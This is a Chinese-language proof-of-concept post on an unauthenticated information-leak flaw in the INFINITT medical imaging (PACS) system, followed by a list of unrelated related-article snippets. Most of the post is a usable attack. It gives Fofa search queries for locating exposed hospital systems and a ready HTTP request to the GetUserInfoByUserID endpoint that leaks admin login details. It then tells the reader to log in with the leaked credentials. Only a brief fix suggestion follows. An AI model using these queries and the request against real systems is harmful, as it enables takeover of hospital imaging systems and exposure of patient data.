英飞达医学影像系统 WebUserLogin.asmx 未授权信息泄露漏洞复现

embedded/2024/10/20 3:09:47/

0x01 产品描述:

       英飞达医学影像存档与通信系统(PACS)‌是一种应用于医院影像科室的系统,主要任务是将日常产生的各种医学影像(包括核磁、CT、超声、X光机等设备产生的图像)通过不同接口以数字化的方式保存,并在需要时快速调用,同时提供辅助诊断管理功能。它在医院数字化建设中扮演着重要角色,促进了医学影像的高效管理和资源共享‌

0x02 漏洞描述:

        ‌英飞达医学影像存档与通信系统(PACS)‌在/GetUserInfoByUserID接口中存在未授权访问,泄露登录等敏感信息,导致攻击者可登录接管系统。        

0x03 搜索语句:

Fofa:"INFINITT" && (icon_hash="1474455751" || icon_hash="702238928")

Fofa:body="./scripts/library/bluebird.min.js"

0x04 漏洞复现:

GET /webservices/WebUserLogin.asmx/GetUserInfoByUserID?userID=admin HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Connection: keep-alive

 使用泄露的用户名/密码尝试登录

0x05 修复建议:

对未授权信息泄露的接口加上权限校验,或接口加入ip白名单限制,同时回显数据进行脱敏处理。


http://www.ppmy.cn/embedded/128884.html

相关文章

利用行列式法求解二元线性方程组

文章目录 一、二元线性方程组二、利用行列式法求解三、案例演示1、二元线性方程组2、求解二元线性方程组3、利用Python求解(1)编写代码,实现功能(2)运行程序,查看结果四、小结一、二元线性方程组 二元线性方程组 { a 11 x 1 + a 12 x 2

Golang笔记_day06

一、GMP 调度器 1、调度器理解思路 理解golang的调度器要从进程到协程演进来说明: 进程--->线程--->协程---> golang的协程(goroutine) 从上图可以看出,进程到多线程到协程,最终目的就是为了提高CPU的利用率…

IDEA如何用maven打包(界面和命令两种方式)

前言 我们在使用IDEA开发时,如果是springboot项目的话,一般是用maven来管理我们的依赖的。然后,当我们开发完成之后,就需要打包部署了。 那么,我们应该如何打包呢? 如何打包(jar包&#xff09…

基于语音识别的停车共享小程序(lw+演示+源码+运行)

目 录 1 绪论1 1.1 课题研究背景1 1.2 研究现状1 1.3 论文结构安排1 2 系统关键技术2 2.1 微信小程序2 2.2 微信Web开发者工具2 2.3 JavaScript简介2 2.4 微信小程序API接口2 2.5 MYSQL数据库2 3 系统分析1 3.1 可行性分析1 3.1.1 技术可行性1 3.1.2 经济可行性1…

Android TextureView实现Camera相机预览、拍照功能

说明&#xff1a;本文使用的是Camera&#xff0c;不是Camera2&#xff0c;CameraX。 1、首先AndroidManifest添加相机使用权限 <!-- 相机相关 --><uses-permission android:name"android.permission.WRITE_EXTERNAL_STORAGE" /><uses-permission and…

云原生后端

云原生后端 云原生后端是当今软件开发领域的一个重要概念&#xff0c;它代表了将软件应用程序容器化部署在云环境中&#xff0c;并采用微服务架构进行开发和管理的一种趋势。这种趋势的兴起&#xff0c;得益于云计算和微服务架构的快速发展&#xff0c;以及企业对高效、灵活、…

OpenEuler操作系统 安装 部署 配置

目录 安装配置准备工作安装配置部署OpenEuler操作系统配置OpenEuler系统使用MoBaXterm连接关闭selinux&#xff0c; firewalld修改主机名修改root密码配置yum源查看网卡配置下载软件 网络配置nmtui——图形化界面配置nmclivim 修改系统文件 克隆虚拟机 安装配置 准备工作 进入…

如何测试IP速度?

了解代理的连接速度是否快速是确保网络使用效率和体验的关键因素之一。本文来为大家如何有效地评估和测试代理IP的连接速度&#xff0c;以及一些实用的方法和工具&#xff0c;帮助用户做出明智的选择和决策。 一、如何评估代理IP的连接速度 1. 使用在线速度测试工具 为了快速…